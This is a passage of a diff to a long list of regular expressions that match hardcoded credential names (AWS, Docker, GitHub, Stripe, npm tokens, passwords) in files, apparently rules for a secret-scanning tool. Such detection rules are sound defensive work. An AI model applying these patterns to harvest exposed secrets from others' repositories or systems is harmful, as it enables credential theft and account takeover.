"env[_-]?heroku[_-]?api[_-]?key(=| =|:| :)" - - "env[_-]?github[_-]?oauth[_-]?token(=| =|:| :)" - - "end[_-]?user[_-]?password(=| =|:| :)" - - "encryption[_-]?password(=| =|:| :)" - - "elasticsearch[_-]?password(=| =|:| :)" - - "elastic[_-]?cloud[_-]?auth(=| =|:| :)" - - "dsonar[_-]?projectkey(=| =|:| :)" - - "dsonar[_-]?login(=| =|:| :)" - - "droplet[_-]?travis[_-]?password(=| =|:| :)" - - "dropbox[_-]?oauth[_-]?bearer(=| =|:| :)" - - "doordash[_-]?auth[_-]?token(=| =|:| :)" - - "dockerhubpassword(=| =|:| :)" - - "dockerhub[_-]?password(=| =|:| :)" - - "docker[_-]?token(=| =|:| :)" - - "docker[_-]?postgres[_-]?url(=| =|:| :)" - - "docker[_-]?password(=| =|:| :)" - - "docker[_-]?passwd(=| =|:| :)" - - "docker[_-]?pass(=| =|:| :)" - - "docker[_-]?key(=| =|:| :)" - - "docker[_-]?hub[_-]?password(=| =|:| :)" - - "digitalocean[_-]?ssh[_-]?key[_-]?ids(=| =|:| :)" - - "digitalocean[_-]?ssh[_-]?key[_-]?body(=| =|:| :)" - - "digitalocean[_-]?access[_-]?token(=| =|:| :)" - - "dgpg[_-]?passphrase(=| =|:| :)" - - "deploy[_-]?user(=| =|:| :)" - - "deploy[_-]?token(=| =|:| :)" - - "deploy[_-]?secure(=| =|:| :)" - - "deploy[_-]?password(=| =|:| :)" - - "ddgc[_-]?github[_-]?token(=| =|:| :)" - - "ddg[_-]?test[_-]?email[_-]?pw(=| =|:| :)" - - "ddg[_-]?test[_-]?email(=| =|:| :)" - - "db[_-]?username(=| =|:| :)" - - "db[_-]?user(=| =|:| :)" - - "db[_-]?pw(=| =|:| :)" - - "db[_-]?password(=| =|:| :)" - - "db[_-]?host(=| =|:| :)" - - "db[_-]?database(=| =|:| :)" - - "db[_-]?connection(=| =|:| :)" - - "datadog[_-]?app[_-]?key(=| =|:| :)" - - "datadog[_-]?api[_-]?key(=| =|:| :)" - - "database[_-]?username(=| =|:| :)" - - "database[_-]?user(=| =|:| :)" - - "database[_-]?port(=| =|:| :)" - - "database[_-]?password(=| =|:| :)" - - "database[_-]?name(=| =|:| :)" - - "database[_-]?host(=| =|:| :)" - - "danger[_-]?github[_-]?api[_-]?token(=| =|:| :)" - - "cypress[_-]?record[_-]?key(=| =|:| :)" - - "coverity[_-]?scan[_-]?token(=| =|:| :)" - - "coveralls[_-]?token(=| =|:| :)" - - "coveralls[_-]?repo[_-]?token(=| =|:| :)" - - "coveralls[_-]?api[_-]?token(=| =|:| :)" - - "cos[_-]?secrets(=| =|:| :)" - - "conversation[_-]?username(=| =|:| :)" - - "conversation[_-]?password(=| =|:| :)" - - "contentful[_-]?v2[_-]?access[_-]?token(=| =|:| :)" - - "contentful[_-]?test[_-]?org[_-]?cma[_-]?token(=| =|:| :)" - - "contentful[_-]?php[_-]?management[_-]?test[_-]?token(=| =|:| :)" - - "contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new(=| =|:| :)" - - "contentful[_-]?management[_-]?api[_-]?access[_-]?token(=| =|:| :)" - - "contentful[_-]?integration[_-]?management[_-]?token(=| =|:| :)" - - "contentful[_-]?cma[_-]?test[_-]?token(=| =|:| :)" - - "contentful[_-]?access[_-]?token(=| =|:| :)" - - "consumerkey(=| =|:| :)" - - "consumer[_-]?key(=| =|:| :)" - - "conekta[_-]?apikey(=| =|:| :)" - - "coding[_-]?token(=| =|:| :)" - - "codecov[_-]?token(=| =|:| :)" - - "codeclimate[_-]?repo[_-]?token(=| =|:| :)" - - "codacy[_-]?project[_-]?token(=| =|:| :)" - - "cocoapods[_-]?trunk[_-]?token(=| =|:| :)" - - "cocoapods[_-]?trunk[_-]?email(=| =|:| :)" - - "cn[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "cn[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "clu[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)" - - "clu[_-]?repo[_-]?url(=| =|:| :)" - - "cloudinary[_-]?url[_-]?staging(=| =|:| :)" - - "cloudinary[_-]?url(=| =|:| :)" - - "cloudflare[_-]?email(=| =|:| :)" - - "cloudflare[_-]?auth[_-]?key(=| =|:| :)" - - "cloudflare[_-]?auth[_-]?email(=| =|:| :)" - - "cloudflare[_-]?api[_-]?key(=| =|:| :)" - - "cloudant[_-]?service[_-]?database(=| =|:| :)" - - "cloudant[_-]?processed[_-]?database(=| =|:| :)" - - "cloudant[_-]?password(=| =|:| :)" - - "cloudant[_-]?parsed[_-]?database(=| =|:| :)" - - "cloudant[_-]?order[_-]?database(=| =|:| :)" - - "cloudant[_-]?instance(=| =|:| :)" - - "cloudant[_-]?database(=| =|:| :)" - - "cloudant[_-]?audited[_-]?database(=| =|:| :)" - - "cloudant[_-]?archived[_-]?database(=| =|:| :)" - - "cloud[_-]?api[_-]?key(=| =|:| :)" - - "clojars[_-]?password(=| =|:| :)" - - "client[_-]?secret(=| =|:| :)" - - "cli[_-]?e2e[_-]?cma[_-]?token(=| =|:| :)" - - "claimr[_-]?token(=| =|:| :)" - - "claimr[_-]?superuser(=| =|:| :)" - - "claimr[_-]?db(=| =|:| :)" - - "claimr[_-]?database(=| =|:| :)" - - "ci[_-]?user[_-]?token(=| =|:| :)" - - "ci[_-]?server[_-]?name(=| =|:| :)" - - "ci[_-]?registry[_-]?user(=| =|:| :)" - - "ci[_-]?project[_-]?url(=| =|:| :)" - - "ci[_-]?deploy[_-]?password(=| =|:| :)" - - "chrome[_-]?refresh[_-]?token(=| =|:| :)" - - "chrome[_-]?client[_-]?secret(=| =|:| :)" - - "cheverny[_-]?token(=| =|:| :)" - - "cf[_-]?password(=| =|:| :)" - - "certificate[_-]?password(=| =|:| :)" - - "censys[_-]?secret(=| =|:| :)" - - "cattle[_-]?secret[_-]?key(=| =|:| :)" - - "cattle[_-]?agent[_-]?instance[_-]?auth(=| =|:| :)" - - "cattle[_-]?access[_-]?key(=| =|:| :)" - - "cargo[_-]?token(=| =|:| :)" - - "cache[_-]?s3[_-]?secret[_-]?key(=| =|:| :)" - - "bx[_-]?username(=| =|:| :)" - - "bx[_-]?password(=| =|:| :)" - - "bundlesize[_-]?github[_-]?token(=| =|:| :)" - - "built[_-]?branch[_-]?deploy[_-]?key(=| =|:| :)" - - "bucketeer[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "bucketeer[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "browserstack[_-]?access[_-]?key(=| =|:| :)" - - "browser[_-]?stack[_-]?access[_-]?key(=| =|:| :)" - - "brackets[_-]?repo[_-]?oauth[_-]?token(=| =|:| :)" - - "bluemix[_-]?username(=| =|:| :)" - - "bluemix[_-]?pwd(=| =|:| :)" - - "bluemix[_-]?password(=| =|:| :)" - - "bluemix[_-]?pass[_-]?prod(=| =|:| :)" - - "bluemix[_-]?pass(=| =|:| :)" - - "bluemix[_-]?auth(=| =|:| :)" - - "bluemix[_-]?api[_-]?key(=| =|:| :)" - - "bintraykey(=| =|:| :)" - - "bintray[_-]?token(=| =|:| :)" - - "bintray[_-]?key(=| =|:| :)" - - "bintray[_-]?gpg[_-]?password(=| =|:| :)" - - "bintray[_-]?apikey(=| =|:| :)" - - "bintray[_-]?api[_-]?key(=| =|:| :)" - - "b2[_-]?bucket(=| =|:| :)" - - "b2[_-]?app[_-]?key(=| =|:| :)" - - "awssecretkey(=| =|:| :)" - - "awscn[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "awscn[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "awsaccesskeyid(=| =|:| :)" - - "aws[_-]?ses[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "aws[_-]?ses[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "aws[_-]?secrets(=| =|:| :)" - - "aws[_-]?secret[_-]?key(=| =|:| :)" - - "aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "aws[_-]?secret(=| =|:| :)" - - "aws[_-]?key(=| =|:| :)" - - "aws[_-]?config[_-]?secretaccesskey(=| =|:| :)" - - "aws[_-]?config[_-]?accesskeyid(=| =|:| :)" - - "aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "aws[_-]?access[_-]?key(=| =|:| :)" - - "aws[_-]?access(=| =|:| :)" - - "author[_-]?npm[_-]?api[_-]?key(=| =|:| :)" - - "author[_-]?email[_-]?addr(=| =|:| :)" - - "auth0[_-]?client[_-]?secret(=| =|:| :)" - - "auth0[_-]?api[_-]?clientsecret(=| =|:| :)" - - "auth[_-]?token(=| =|:| :)" - - "assistant[_-]?iam[_-]?apikey(=| =|:| :)" - - "artifacts[_-]?secret(=| =|:| :)" - - "artifacts[_-]?key(=| =|:| :)" - - "artifacts[_-]?bucket(=| =|:| :)" - - "artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "artifacts[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" - - "artifactory[_-]?key(=| =|:| :)" - - "argos[_-]?token(=| =|:| :)" - - "apple[_-]?id[_-]?password(=| =|:| :)" - - "appclientsecret(=| =|:| :)" - - "app[_-]?token(=| =|:| :)" - - "app[_-]?secrete(=| =|:| :)" - - "app[_-]?report[_-]?token[_-]?key(=| =|:| :)" - - "app[_-]?bucket[_-]?perm(=| =|:| :)" - - "apigw[_-]?access[_-]?token(=| =|:| :)" - - "apiary[_-]?api[_-]?key(=| =|:| :)" - - "api[_-]?secret(=| =|:| :)" - - "api[_-]?key[_-]?sid(=| =|:| :)" - - "api[_-]?key[_-]?secret(=| =|:| :)" - - "api[_-]?key(=| =|:| :)" - - "aos[_-]?sec(=| =|:| :)" - - "aos[_-]?key(=| =|:| :)" - - "ansible[_-]?vault[_-]?password(=| =|:| :)" - - "android[_-]?docs[_-]?deploy[_-]?token(=| =|:| :)" - - "anaconda[_-]?token(=| =|:| :)" - - "amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :)" - - "amazon[_-]?bucket[_-]?name(=| =|:| :)" - - "alicloud[_-]?secret[_-]?key(=| =|:| :)" - - "alicloud[_-]?access[_-]?key(=| =|:| :)" - - "alias[_-]?pass(=| =|:| :)" - - "algolia[_-]?search[_-]?key[_-]?1(=| =|:| :)" - - "algolia[_-]?search[_-]?key(=| =|:| :)" - - "algolia[_-]?search[_-]?api[_-]?key(=| =|:| :)" - - "algolia[_-]?api[_-]?key[_-]?search(=| =|:| :)" - - "algolia[_-]?api[_-]?key[_-]?mcm(=| =|:| :)" - - "algolia[_-]?api[_-]?key(=| =|:| :)" - - "algolia[_-]?admin[_-]?key[_-]?mcm(=| =|:| :)" - - "algolia[_-]?admin[_-]?key[_-]?2(=| =|:| :)" - - "algolia[_-]?admin[_-]?key[_-]?1(=| =|:| :)" - - "adzerk[_-]?api[_-]?key(=| =|:| :)" - - "admin[_-]?email(=| =|:| :)" - - "account[_-]?sid(=| =|:| :)" - - "access[_-]?token(=| =|:| :)" - - "access[_-]?secret(=| =|:| :)" - - "access[_-]?key[_-]?secret(=| =|:| :)" \ No newline at end of file + - "(?i)zopim[_-]?account[_-]?key(=| =|:| :)" + - "(?i)zhuliang[_-]?gh[_-]?token(=| =|:| :)" + - "(?i)zensonatypepassword(=| =|:| :)" + - "(?i)zendesk[_-]?travis[_-]?github(=| =|:| :)" + - "(?i)yt[_-]?server[_-]?api[_-]?key(=| =|:| :)" + - "(?i)yt[_-]?partner[_-]?refresh[_-]?token(=| =|:| :)" + - "(?i)yt[_-]?partner[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)yt[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)yt[_-]?api[_-]?key(=| =|:| :)" + - "(?i)yt[_-]?account[_-]?refresh[_-]?token(=| =|:| :)" + - "(?i)yt[_-]?account[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)yangshun[_-]?gh[_-]?token(=| =|:| :)" + - "(?i)yangshun[_-]?gh[_-]?password(=| =|:| :)" + - "(?i)www[_-]?googleapis[_-]?com(=| =|:| :)" + - "(?i)wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :)" + - "(?i)wpt[_-]?ssh[_-]?connect(=| =|:| :)" + - "(?i)wpt[_-]?report[_-]?api[_-]?key(=| =|:| :)" + - "(?i)wpt[_-]?prepare[_-]?dir(=| =|:| :)" + - "(?i)wpt[_-]?db[_-]?user(=| =|:| :)" + - "(?i)wpt[_-]?db[_-]?password(=| =|:| :)" + - "(?i)wporg[_-]?password(=| =|:| :)" + - "(?i)wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key(=| =|:| :)" + - "(?i)wordpress[_-]?db[_-]?user(=| =|:| :)" + - "(?i)wordpress[_-]?db[_-]?password(=| =|:| :)" + - "(?i)wincert[_-]?password(=| =|:| :)" + - "(?i)widget[_-]?test[_-]?server(=| =|:| :)" + - "(?i)widget[_-]?fb[_-]?password[_-]?3(=| =|:| :)" + - "(?i)widget[_-]?fb[_-]?password[_-]?2(=| =|:| :)" + - "(?i)widget[_-]?fb[_-]?password(=| =|:| :)" + - "(?i)widget[_-]?basic[_-]?password[_-]?5(=| =|:| :)" + - "(?i)widget[_-]?basic[_-]?password[_-]?4(=| =|:| :)" + - "(?i)widget[_-]?basic[_-]?password[_-]?3(=| =|:| :)" + - "(?i)widget[_-]?basic[_-]?password[_-]?2(=| =|:| :)" + - "(?i)widget[_-]?basic[_-]?password(=| =|:| :)" + - "(?i)watson[_-]?password(=| =|:| :)" + - "(?i)watson[_-]?device[_-]?password(=| =|:| :)" + - "(?i)watson[_-]?conversation[_-]?password(=| =|:| :)" + - "(?i)wakatime[_-]?api[_-]?key(=| =|:| :)" + - "(?i)vscetoken(=| =|:| :)" + - "(?i)visual[_-]?recognition[_-]?api[_-]?key(=| =|:| :)" + - "(?i)virustotal[_-]?apikey(=| =|:| :)" + - "(?i)vip[_-]?github[_-]?deploy[_-]?key[_-]?pass(=| =|:| :)" + - "(?i)vip[_-]?github[_-]?deploy[_-]?key(=| =|:| :)" + - "(?i)vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key(=| =|:| :)" + - "(?i)v[_-]?sfdc[_-]?password(=| =|:| :)" + - "(?i)v[_-]?sfdc[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)usertravis(=| =|:| :)" + - "(?i)user[_-]?assets[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)use[_-]?ssh(=| =|:| :)" + - "(?i)us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com(=| =|:| :)" + - "(?i)urban[_-]?secret(=| =|:| :)" + - "(?i)urban[_-]?master[_-]?secret(=| =|:| :)" + - "(?i)urban[_-]?key(=| =|:| :)" + - "(?i)unity[_-]?serial(=| =|:| :)" + - "(?i)unity[_-]?password(=| =|:| :)" + - "(?i)twitteroauthaccesstoken(=| =|:| :)" + - "(?i)twitteroauthaccesssecret(=| =|:| :)" + - "(?i)twitter[_-]?consumer[_-]?secret(=| =|:| :)" + - "(?i)twitter[_-]?consumer[_-]?key(=| =|:| :)" + - "(?i)twine[_-]?password(=| =|:| :)" + - "(?i)twilio[_-]?token(=| =|:| :)" + - "(?i)twilio[_-]?sid(=| =|:| :)" + - "(?i)twilio[_-]?configuration[_-]?sid(=| =|:| :)" + - "(?i)twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :)" + - "(?i)twilio[_-]?api[_-]?secret(=| =|:| :)" + - "(?i)twilio[_-]?api[_-]?key(=| =|:| :)" + - "(?i)trex[_-]?okta[_-]?client[_-]?token(=| =|:| :)" + - "(?i)trex[_-]?client[_-]?token(=| =|:| :)" + - "(?i)travis[_-]?token(=| =|:| :)" + - "(?i)travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :)" + - "(?i)travis[_-]?pull[_-]?request(=| =|:| :)" + - "(?i)travis[_-]?gh[_-]?token(=| =|:| :)" + - "(?i)travis[_-]?e2e[_-]?token(=| =|:| :)" + - "(?i)travis[_-]?com[_-]?token(=| =|:| :)" + - "(?i)travis[_-]?branch(=| =|:| :)" + - "(?i)travis[_-]?api[_-]?token(=| =|:| :)" + - "(?i)travis[_-]?access[_-]?token(=| =|:| :)" + - "(?i)token[_-]?core[_-]?java(=| =|:| :)" + - "(?i)thera[_-]?oss[_-]?access[_-]?key(=| =|:| :)" + - "(?i)tester[_-]?keys[_-]?password(=| =|:| :)" + - "(?i)test[_-]?test(=| =|:| :)" + - "(?i)test[_-]?github[_-]?token(=| =|:| :)" + - "(?i)tesco[_-]?api[_-]?key(=| =|:| :)" + - "(?i)svn[_-]?pass(=| =|:| :)" + - "(?i)surge[_-]?token(=| =|:| :)" + - "(?i)surge[_-]?login(=| =|:| :)" + - "(?i)stripe[_-]?public(=| =|:| :)" + - "(?i)stripe[_-]?private(=| =|:| :)" + - "(?i)strip[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)strip[_-]?publishable[_-]?key(=| =|:| :)" + - "(?i)stormpath[_-]?api[_-]?key[_-]?secret(=| =|:| :)" + - "(?i)stormpath[_-]?api[_-]?key[_-]?id(=| =|:| :)" + - "(?i)starship[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)starship[_-]?account[_-]?sid(=| =|:| :)" + - "(?i)star[_-]?test[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)star[_-]?test[_-]?location(=| =|:| :)" + - "(?i)star[_-]?test[_-]?bucket(=| =|:| :)" + - "(?i)star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)staging[_-]?base[_-]?url[_-]?runscope(=| =|:| :)" + - "(?i)ssmtp[_-]?config(=| =|:| :)" + - "(?i)sshpass(=| =|:| :)" + - "(?i)srcclr[_-]?api[_-]?token(=| =|:| :)" + - "(?i)square[_-]?reader[_-]?sdk[_-]?repository[_-]?password(=| =|:| :)" + - "(?i)sqssecretkey(=| =|:| :)" + - "(?i)sqsaccesskey(=| =|:| :)" + - "(?i)spring[_-]?mail[_-]?password(=| =|:| :)" + - "(?i)spotify[_-]?api[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)spotify[_-]?api[_-]?access[_-]?token(=| =|:| :)" + - "(?i)spaces[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)spaces[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)soundcloud[_-]?password(=| =|:| :)" + - "(?i)soundcloud[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)sonatypepassword(=| =|:| :)" + - "(?i)sonatype[_-]?token[_-]?user(=| =|:| :)" + - "(?i)sonatype[_-]?token[_-]?password(=| =|:| :)" + - "(?i)sonatype[_-]?password(=| =|:| :)" + - "(?i)sonatype[_-]?pass(=| =|:| :)" + - "(?i)sonatype[_-]?nexus[_-]?password(=| =|:| :)" + - "(?i)sonatype[_-]?gpg[_-]?passphrase(=| =|:| :)" + - "(?i)sonatype[_-]?gpg[_-]?key[_-]?name(=| =|:| :)" + - "(?i)sonar[_-]?token(=| =|:| :)" + - "(?i)sonar[_-]?project[_-]?key(=| =|:| :)" + - "(?i)sonar[_-]?organization[_-]?key(=| =|:| :)" + - "(?i)socrata[_-]?password(=| =|:| :)" + - "(?i)socrata[_-]?app[_-]?token(=| =|:| :)" + - "(?i)snyk[_-]?token(=| =|:| :)" + - "(?i)snyk[_-]?api[_-]?token(=| =|:| :)" + - "(?i)snoowrap[_-]?refresh[_-]?token(=| =|:| :)" + - "(?i)snoowrap[_-]?password(=| =|:| :)" + - "(?i)snoowrap[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)slate[_-]?user[_-]?email(=| =|:| :)" + - "(?i)slash[_-]?developer[_-]?space[_-]?key(=| =|:| :)" + - "(?i)slash[_-]?developer[_-]?space(=| =|:| :)" + - "(?i)signing[_-]?key[_-]?sid(=| =|:| :)" + - "(?i)signing[_-]?key[_-]?secret(=| =|:| :)" + - "(?i)signing[_-]?key[_-]?password(=| =|:| :)" + - "(?i)signing[_-]?key(=| =|:| :)" + - "(?i)setsecretkey(=| =|:| :)" + - "(?i)setdstsecretkey(=| =|:| :)" + - "(?i)setdstaccesskey(=| =|:| :)" + - "(?i)ses[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)ses[_-]?access[_-]?key(=| =|:| :)" + - "(?i)service[_-]?account[_-]?secret(=| =|:| :)" + - "(?i)sentry[_-]?key(=| =|:| :)" + - "(?i)sentry[_-]?secret(=| =|:| :)" + - "(?i)sentry[_-]?endpoint(=| =|:| :)" + - "(?i)sentry[_-]?default[_-]?org(=| =|:| :)" + - "(?i)sentry[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)sendwithus[_-]?key(=| =|:| :)" + - "(?i)sendgrid[_-]?username(=| =|:| :)" + - "(?i)sendgrid[_-]?user(=| =|:| :)" + - "(?i)sendgrid[_-]?password(=| =|:| :)" + - "(?i)sendgrid[_-]?key(=| =|:| :)" + - "(?i)sendgrid[_-]?api[_-]?key(=| =|:| :)" + - "(?i)sendgrid(=| =|:| :)" + - "(?i)selion[_-]?selenium[_-]?host(=| =|:| :)" + - "(?i)selion[_-]?log[_-]?level[_-]?dev(=| =|:| :)" + - "(?i)segment[_-]?api[_-]?key(=| =|:| :)" + - "(?i)secretkey(=| =|:| :)" + - "(?i)secretaccesskey(=| =|:| :)" + - "(?i)secret[_-]?key[_-]?base(=| =|:| :)" + - "(?i)secret[_-]?9(=| =|:| :)" + - "(?i)secret[_-]?8(=| =|:| :)" + - "(?i)secret[_-]?7(=| =|:| :)" + - "(?i)secret[_-]?6(=| =|:| :)" + - "(?i)secret[_-]?5(=| =|:| :)" + - "(?i)secret[_-]?4(=| =|:| :)" + - "(?i)secret[_-]?3(=| =|:| :)" + - "(?i)secret[_-]?2(=| =|:| :)" + - "(?i)secret[_-]?11(=| =|:| :)" + - "(?i)secret[_-]?10(=| =|:| :)" + - "(?i)secret[_-]?1(=| =|:| :)" + - "(?i)secret[_-]?0(=| =|:| :)" + - "(?i)sdr[_-]?token(=| =|:| :)" + - "(?i)scrutinizer[_-]?token(=| =|:| :)" + - "(?i)sauce[_-]?access[_-]?key(=| =|:| :)" + - "(?i)sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :)" + - "(?i)sandbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)sandbox[_-]?access[_-]?token(=| =|:| :)" + - "(?i)salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token(=| =|:| :)" + - "(?i)salesforce[_-]?bulk[_-]?test[_-]?password(=| =|:| :)" + - "(?i)sacloud[_-]?api(=| =|:| :)" + - "(?i)sacloud[_-]?access[_-]?token[_-]?secret(=| =|:| :)" + - "(?i)sacloud[_-]?access[_-]?token(=| =|:| :)" + - "(?i)s3[_-]?user[_-]?secret(=| =|:| :)" + - "(?i)s3[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)s3[_-]?secret[_-]?assets(=| =|:| :)" + - "(?i)s3[_-]?secret[_-]?app[_-]?logs(=| =|:| :)" + - "(?i)s3[_-]?key[_-]?assets(=| =|:| :)" + - "(?i)s3[_-]?key[_-]?app[_-]?logs(=| =|:| :)" + - "(?i)s3[_-]?key(=| =|:| :)" + - "(?i)s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com(=| =|:| :)" + - "(?i)s3[_-]?bucket[_-]?name[_-]?assets(=| =|:| :)" + - "(?i)s3[_-]?bucket[_-]?name[_-]?app[_-]?logs(=| =|:| :)" + - "(?i)s3[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)s3[_-]?access[_-]?key(=| =|:| :)" + - "(?i)rubygems[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)rtd[_-]?store[_-]?pass(=| =|:| :)" + - "(?i)rtd[_-]?key[_-]?pass(=| =|:| :)" + - "(?i)route53[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)ropsten[_-]?private[_-]?key(=| =|:| :)" + - "(?i)rinkeby[_-]?private[_-]?key(=| =|:| :)" + - "(?i)rest[_-]?api[_-]?key(=| =|:| :)" + - "(?i)repotoken(=| =|:| :)" + - "(?i)reporting[_-]?webdav[_-]?url(=| =|:| :)" + - "(?i)reporting[_-]?webdav[_-]?pwd(=| =|:| :)" + - "(?i)release[_-]?token(=| =|:| :)" + - "(?i)release[_-]?gh[_-]?token(=| =|:| :)" + - "(?i)registry[_-]?secure(=| =|:| :)" + - "(?i)registry[_-]?pass(=| =|:| :)" + - "(?i)refresh[_-]?token(=| =|:| :)" + - "(?i)rediscloud[_-]?url(=| =|:| :)" + - "(?i)redis[_-]?stunnel[_-]?urls(=| =|:| :)" + - "(?i)randrmusicapiaccesstoken(=| =|:| :)" + - "(?i)rabbitmq[_-]?password(=| =|:| :)" + - "(?i)quip[_-]?token(=| =|:| :)" + - "(?i)qiita[_-]?token(=| =|:| :)" + - "(?i)pypi[_-]?passowrd(=| =|:| :)" + - "(?i)pushover[_-]?token(=| =|:| :)" + - "(?i)publish[_-]?secret(=| =|:| :)" + - "(?i)publish[_-]?key(=| =|:| :)" + - "(?i)publish[_-]?access(=| =|:| :)" + - "(?i)project[_-]?config(=| =|:| :)" + - "(?i)prod[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)prod[_-]?password(=| =|:| :)" + - "(?i)prod[_-]?access[_-]?key[_-]?id(=| =|:| :)" + - "(?i)private[_-]?signing[_-]?password(=| =|:| :)" + - "(?i)pring[_-]?mail[_-]?username(=| =|:| :)" + - "(?i)preferred[_-]?username(=| =|:| :)" + - "(?i)prebuild[_-]?auth(=| =|:| :)" + - "(?i)postgresql[_-]?pass(=| =|:| :)" + - "(?i)postgresql[_-]?db(=| =|:| :)" + - "(?i)postgres[_-]?env[_-]?postgres[_-]?password(=| =|:| :)" + - "(?i)postgres[_-]?env[_-]?postgres[_-]?db(=| =|:| :)" + - "(?i)plugin[_-]?password(=| =|:| :)" + - "(?i)plotly[_-]?apikey(=| =|:| :)" + - "(?i)places[_-]?apikey(=| =|:| :)" + - "(?i)places[_-]?api[_-]?key(=| =|:| :)" + - "(?i)pg[_-]?host(=| =|:| :)" + - "(?i)pg[_-]?database(=| =|:| :)" + - "(?i)personal[_-]?secret(=| =|:| :)" + - "(?i)personal[_-]?key(=| =|:| :)" + - "(?i)percy[_-]?token(=| =|:| :)" + - "(?i)percy[_-]?project(=| =|:| :)" + - "(?i)paypal[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)passwordtravis(=| =|:| :)" + - "(?i)parse[_-]?js[_-]?key(=| =|:| :)" + - "(?i)pagerduty[_-]?apikey(=| =|:| :)" + - "(?i)packagecloud[_-]?token(=| =|:| :)" + - "(?i)ossrh[_-]?username(=| =|:| :)" + - "(?i)ossrh[_-]?secret(=| =|:| :)" + - "(?i)ossrh[_-]?password(=| =|:| :)" + - "(?i)ossrh[_-]?pass(=| =|:| :)" + - "(?i)ossrh[_-]?jira[_-]?password(=| =|:| :)" + - "(?i)os[_-]?password(=| =|:| :)" + - "(?i)os[_-]?auth[_-]?url(=| =|:| :)" + - "(?i)org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)" + - "(?i)org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :)" + - "(?i)openwhisk[_-]?key(=| =|:| :)" + - "(?i)open[_-]?whisk[_-]?key(=| =|:| :)" + - "(?i)onesignal[_-]?user[_-]?auth[_-]?key(=| =|:| :)" + - "(?i)onesignal[_-]?api[_-]?key(=| =|:| :)" + - "(?i)omise[_-]?skey(=| =|:| :)" + - "(?i)omise[_-]?pubkey(=| =|:| :)" + - "(?i)omise[_-]?pkey(=| =|:| :)" + - "(?i)omise[_-]?key(=| =|:| :)" + - "(?i)okta[_-]?oauth2[_-]?clientsecret(=| =|:| :)" + - "(?i)okta[_-]?oauth2[_-]?client[_-]?secret(=| =|:| :)" + - "(?i)okta[_-]?client[_-]?token(=| =|:| :)" + - "(?i)ofta[_-]?secret(=| =|:| :)" + - "(?i)ofta[_-]?region(=| =|:| :)" + - "(?i)ofta[_-]?key(=| =|:| :)" + - "(?i)octest[_-]?password(=| =|:| :)" + - "(?i)octest[_-]?app[_-]?username(=| =|:| :)" + - "(?i)octest[_-]?app[_-]?password(=| =|:| :)" + - "(?i)oc[_-]?pass(=| =|:| :)" + - "(?i)object[_-]?store[_-]?creds(=| =|:| :)" + - "(?i)object[_-]?store[_-]?bucket(=| =|:| :)" + - "(?i)object[_-]?storage[_-]?region[_-]?name(=| =|:| :)" + - "(?i)object[_-]?storage[_-]?password(=| =|:| :)" + - "(?i)oauth[_-]?token(=| =|:| :)" + - "(?i)numbers[_-]?service[_-]?pass(=| =|:| :)" + - "(?i)nuget[_-]?key(=| =|:| :)" + - "(?i)nuget[_-]?apikey(=| =|:| :)" + - "(?i)nuget[_-]?api[_-]?key(=| =|:| :)" + - "(?i)npm[_-]?token(=| =|:| :)" + - "(?i)npm[_-]?secret[_-]?key(=| =|:| :)" + - "(?i)npm[_-]?password(=| =|:| :)" + - "(?i)npm[_-]?email(=| =|:| :)" + - "(?i)npm[_-]?auth[_-]?token(=| =|:| :)" + - "(?i)npm[_-]?api[_-]?token(=| =|:| :)" + - "(?i)npm[_-]?api[_-]?key(=| =|:| :)" + - "(?i)now[_-]?token(=| =|:| :)" + - "(?i)non[_-]?token(=| =|:| :)" + - "(?i)node[_-]?pre[_-]?gyp[_-]?secretaccesskey(=| =|:| :)" + - 